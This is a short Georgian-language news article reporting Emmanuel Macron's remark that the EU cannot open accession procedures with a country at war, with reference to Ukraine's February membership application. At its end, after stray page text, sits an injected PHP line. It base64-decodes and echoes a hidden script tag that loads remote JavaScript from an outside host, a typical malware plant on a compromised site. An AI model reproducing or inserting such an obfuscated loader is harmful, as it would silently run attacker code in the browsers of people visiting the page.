celsiusi
ავერსი შნაიდერი
საფრანეგეთის პრეზიდენტი ემანუელ მაკრონი აცხადებს, რომ ევროკავშირი საომარ მდგომარეობაში მყოფ ქვეყანასთან გაწევრიანების პროცედურას ვერ დაიწყებს. ამის შესახებ ინფორმაციას უკრაინული მედია ავრცელებს.
 
როგორც მაკრონმა დღეს, ვერსალში ევროკავშირის ლიდერების არაფორმალური სამიტის დაწყებამდე განაცხადა, საომარ მდგომარეობაში მყოფ ქვეყანასთან გაწევრიანებაზე მოლაპარაკება არარეალურია.
 
 
“შეგვიძლია გავხსნათ გაწევრიანების პროცედურა იმ ქვეყანასთან, რომელიც ომშია? მე ასე არ ვფიქრობ, თუმცა, უსამართლობა იქნებოდა კარის დაკეტვა და თქმა „არასოდეს“. – განაცხადა ემანუელ მაკრონმა.
 
ცნობისთვის, რუსეთთან ომში მყოფმა უკრაინამ 28 თებერვალს ევროკავშირში გაწევრიანების შესახებ განაცხადი შეიტანა და განაცხადის დაჩქარებული წესით განხილვა მოითხოვა.
 
983
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");